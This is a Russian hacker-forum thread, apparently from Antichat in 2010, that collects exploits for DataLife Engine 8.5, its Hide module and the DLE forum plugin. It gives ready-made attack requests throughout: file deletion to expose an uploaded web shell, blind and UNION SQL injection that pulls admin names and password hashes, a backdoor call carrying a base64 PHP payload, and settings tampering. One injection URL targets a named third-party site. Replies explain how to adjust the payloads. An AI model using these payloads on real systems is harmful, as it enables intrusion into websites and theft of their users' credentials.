![]() |
Версия ДЛЕ: 8.5 (скорее всего, и преыдущие, но тестил именно на 8.5)
Везде далее: 1){ВАШ ЮЗЕР ХЕШ} - уникальный хеш, который вы получаете при входе в дадминку. Как правило, при переходе по страницам админки он передается гетом в урле, там его и берите. Или же заходите на страницу настроек, к примеру, и ищите в коде user_hash - там он и будет 2)лишние куски кода удалены, оставлены только самые важные, играющие роль при уязвимости. --------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------- Описание: Удаление произвольных файлов Зависимость: Нужны админские права Файл: /engine/inc/files.php Кусок кода: PHP код:
Залогинившись админом, послать post запрос: http://site.com/admin.php?mod=files images%5Bboxsmall.jpg%5D=../uploads/files/.htaccess&action=doimagedelete&userdir=&user_hash= {ВАШ ЮЗЕР ХЕШ} Смысл: 1) Можно удалить .htaccess из папки uploads, загрузить туда шелл и видеть его из веба :) 2) Можно помешать работе сайта, удалив важыне файлы. --------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------- Описание: раскрытие префикса БД. Зависимость: Права журналиста или администратора (любой доступ в админку) Файл: /engine/inc/files.php Кусок кода: PHP код:
Залогинившись админом, послать post запрос: http://hackhack/admin.php?mod=files&action=quick&subaction=upload images_number=1&serverfile=\ --------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------- Описание: Получение названия загруженного файла (шелла, к примеру) через форму заливки Зависимость: Права админа или журналиста с разрешением аливать файлы чреез админку Файл: /admin.php?mod=files Кусок кода: PHP код:
Отсылаем файл, снифаем, что вернул сервер: Date: Mon, 14 Jun 2010 07:35:04 GMT делаем себе PHP код:
--------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------- Описание: Blind-sql Зависимость: magic_quotes_gpc = off и админские права Файл: /engine/ajax/clean.php Кусок кода: PHP код:
http://site.com/engine/ajax/clean.php?date=1'&user_hash={ВАШ ЮЗЕР ХЕШ}&step=2 P.S. Обыная скуля с юнионом не пройдет, так как полученная инфа сразу уходит в DELETE :( Кому надо - тот докрутит ;) --------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------- Версии ДЛЕ ДО 8.5 Описание: редактирование настроек системы, имея лишь ограниченный (модерский) доступ в админку Зависимость: Доступ в админку хотя бы с правами журналиста Файл: /engine/inc/options.php Кусок кода: PHP код:
Авторизовавшись в админке, делаем POST запрос http://site.com/admin.php?mod=options&action=syscon save_con%5Bhome_title%5D=GREAT HACK HOHOHOH&mod=options&action=dosavesyscon&user_hash= {ВАШ ЮЗЕР ХЕШ} причем настроек поменять можно множество вплоть до оотключения сайта ;) --------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------- Описание: раскрытие путей 1) Требуется админка http://site.com/admin.php?mod=static&search_field[]= 2) Админка не требуется, праа Юзерские http://site.com/?do=addnews POST tags[]=1&mod=addnews http://site.com/index.php POST login=submit&login_password[]=1 --------------------------------------------------------------------------------------------------------------------------------------------------- (c) wildshaman 2010. Special for Antichat |
Модуль Hide v.4.2 для DLE
Описание: выполнение произвольного кода (бекдор оставил автор) Зависимость: аккаунт юзера Файл: engine/modules/hide_news.php Кусок кода: PHP код:
Как осуществить: http://site.com/?newsid=XXXX&conf_key=fibona4i&user_id=cGhwaW5mbyg pOw== Где XXX - айди существующей новости, а user_id - забейсенный php код (в данном случае пхпинфо) DLE forum 2.5 (дырявый, как сито) Описание: sql-инъекция Зависимость: - Файл: engine/forum/sources/showtopic.php Кусок кода: PHP код:
http://site.com/?do=forum&act=topic&tid=1+[SQL] |
Цитата:
|
Цитата:
Код:
http://site.ru/?do=forum&showtopic=54%2527+union+select+1,2,CONCAT_WS%280x3a,name,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group%20=1+limit+1Код:
http://rtmusic.co.cc/?do=forum&showtopic=1%2527+union+select+1,2,CONCAT_WS%280x3a,name,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group%20=1+limit+1Да, на многих сайтах колонок где больше где меньше, если появляется сообщение: The used SELECT statements have a different number of columns Значит надо либо добавлять, либо убавлять циферки. |
У шамана скуля для 2.5 версии. Ты привёл пример на 2.4.
Цитата:
Параметры совсем разные... |
Цитата:
|
Цитата:
|
Цитата:
Нужно так PHP код:
|
Цитата:
PHP код:
|
Посмотрел исходники этого скрипта (dle forum 2.5 final nulled by pigini)
/engine/forum/sources/showtopic.php PHP код:
|
| Время: 22:01 |